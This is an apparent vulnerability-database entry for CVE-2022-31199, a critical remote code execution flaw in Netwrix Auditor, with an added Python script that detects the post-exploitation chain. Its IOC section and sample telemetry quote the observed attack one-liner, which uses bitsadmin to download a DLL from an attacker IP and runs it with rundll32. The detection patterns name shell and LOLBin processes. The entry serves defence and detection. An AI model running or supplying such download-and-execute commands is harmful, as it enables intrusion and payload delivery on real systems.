CVE-2022-31199
published 2022-11-08


Priority: P1 (98), critical, CVSS 3.1 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV, ITW, Exploit, Ransomware, Initial access
CISA Known Exploited Vulnerability (remediation due 2023-08-01)
Exploited in the wild
EPSS: 36.15% (98.3rd percentile)
Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents installed on monitored systems. The remote code execution vulnerabilities exist within the underlying protocol used by the component, and potentially allow an unauthenticated remote attacker to execute arbitrary code as the NT AUTHORITY\SYSTEM user on affected systems, including on systems Netwrix Auditor monitors.

Affected

1 range

Vendor | Product | Version range | Fixed in
netwrix | auditor | < 10.5 | 10.5

Detection & IOCs (extracted from sources)

ip: 179.60.150.53
url: hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll
path: c:\ProgramData\msruntime.dll
filename: msruntime.dll
port: 9004/TCP
command: C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll
process: UAVRServer.exe
  • Monitor UAVRServer.exe for spawning cmd.exe or bitsadmin child processes; this indicates exploitation of CVE-2022-31199 followed by Truebot payload staging.
  • Alert on bitsadmin transfers initiated from UAVRServer.exe that drop DLLs into C:\ProgramData\ and are followed by rundll32 execution, the post-exploitation pattern observed for this CVE. Note that the observed command line deletes the DLL right after loading it, so file-based IOCs may already be gone by the time you look; rely on process-creation telemetry rather than disk scans.
  • Block or alert on inbound connections to TCP port 9004 from untrusted sources; this is the port of the vulnerable .NET remoting service exploited by CVE-2022-31199.
  • The vulnerable .NET remoting service (9004/TCP) is typically not internet-exposed, so exploitation most likely comes from an attacker already on the internal network, or from a Netwrix server that is directly internet-facing with no firewall in front of it.
  • Exploitation grants NT AUTHORITY\SYSTEM, and because Netwrix Auditor typically runs with extensive Active Directory privileges, successful exploitation likely leads to full domain compromise.
  • The root cause is insecure .NET object deserialization over an unsecured .NET remoting service: arbitrary objects can be submitted to achieve RCE.
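The detection logic from the bullets above, as an added example that is not part of the source page and not Netwrix's or any vendor's code. It runs three rules over Sysmon Event ID 1 (process creation) records: UAVRServer.exe spawning a shell or LOLBin, a bitsadmin /transfer dropping a DLL under C:\ProgramData, and rundll32 loading a DLL that the previous rule saw dropped within the last five minutes. The second and third rules correlate whether the chain arrives as one "cmd /c a&b&c" line (the observed IOC) or as separate processes. The sample events, the event field names and the UAVRServer.exe install path are constructed assumptions; map them onto your own telemetry.

```python
"""Detection rules for the CVE-2022-31199 post-exploitation chain (added example)."""
import re
from datetime import datetime, timedelta

SUSPICIOUS_CHILDREN = {"cmd.exe", "bitsadmin.exe", "rundll32.exe", "powershell.exe"}
# bitsadmin /transfer <job> <source-url> <destination>; the destination ends at a
# shell separator so "dest&rundll32 ..." does not swallow the next command
TRANSFER_RE = re.compile(r"bitsadmin(?:\.exe)?\s+/transfer\s+\S+\s+\S+\s+([^\s&|]+)", re.I)
# rundll32 [/s] <dll>[,entrypoint]; the DLL path ends at a comma, space or separator
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+(?:/s\s+)?([^\s,&|]+)", re.I)
WINDOW = timedelta(minutes=5)  # how long a dropped DLL stays "hot" for rule 2b


def norm(path):
    """Lower-case, strip quotes and unify separators so paths compare equal."""
    return path.strip('"').replace("/", "\\").lower()


def basename(path):
    return norm(path).rsplit("\\", 1)[-1]


def analyze(events):
    """Return (rule, utc_time, detail) tuples for the given process-creation events."""
    alerts = []
    drops = {}  # normalised DLL path -> time bitsadmin wrote it
    for ev in sorted(events, key=lambda e: e["utc_time"]):
        ts = datetime.fromisoformat(ev["utc_time"])
        parent, child = basename(ev["parent_image"]), basename(ev["image"])
        cmd = ev["command_line"]

        # Rule 1: the video recording service should never launch a shell or LOLBin
        if parent == "uavrserver.exe" and child in SUSPICIOUS_CHILDREN:
            alerts.append(("R1_uavr_spawns_lolbin", ev["utc_time"], f"{parent} -> {child}"))

        # Rule 2a: bitsadmin transfer whose destination is a DLL under C:\ProgramData
        m = TRANSFER_RE.search(cmd)
        if m:
            dest = norm(m.group(1))
            if dest.startswith("c:\\programdata\\") and dest.endswith(".dll"):
                drops[dest] = ts
                alerts.append(("R2a_bits_drops_dll", ev["utc_time"], dest))

        # Rule 2b: rundll32 loading a DLL that rule 2a saw dropped inside WINDOW
        for r in RUNDLL_RE.finditer(cmd):
            dll = norm(r.group(1))
            if dll in drops and ts - drops[dll] <= WINDOW:
                alerts.append(("R2b_rundll32_dropped_dll", ev["utc_time"], dll))
    return alerts


# Constructed sample telemetry (not real logs); the UAVRServer.exe path is assumed.
SAMPLE_EVENTS = [
    {"utc_time": "2023-06-01T10:00:00", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c dir"},
    # the observed one-liner, launched by the Netwrix video recording service
    {"utc_time": "2023-06-01T10:01:00",
     "parent_image": "C:\\Program Files\\Netwrix Auditor\\UAVRServer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer MSVCP "
                     "hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\\ProgramData\\msruntime.dll"
                     "&rundll32 /S c:\\ProgramData\\msruntime.dll,fff&del c:\\ProgramData\\msruntime.dll"},
    # the same chain split into separate processes 30 seconds apart
    {"utc_time": "2023-06-01T11:00:00", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "command_line": "bitsadmin /transfer job1 http://198.51.100.7/x.dll C:\\ProgramData\\x.dll"},
    {"utc_time": "2023-06-01T11:00:30", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "command_line": "rundll32.exe C:\\ProgramData\\x.dll,Start"},
    # rundll32 of a ProgramData DLL nobody was seen dropping: rule 2b stays quiet
    {"utc_time": "2023-06-01T12:00:00", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "command_line": "rundll32.exe C:\\ProgramData\\other.dll,Run"},
]

if __name__ == "__main__":
    for rule, when, detail in analyze(SAMPLE_EVENTS):
        print(f"{when}  {rule:28s} {detail}")
```

Rule 2b deliberately keys on the exact path bitsadmin wrote rather than on "any DLL in ProgramData", which keeps it quiet for the many legitimate installers that run rundll32 from that directory; widen it only if your environment tolerates the noise.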

CVSS provenance

NVD: v3.1 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL
CISA: 9.8 CRITICAL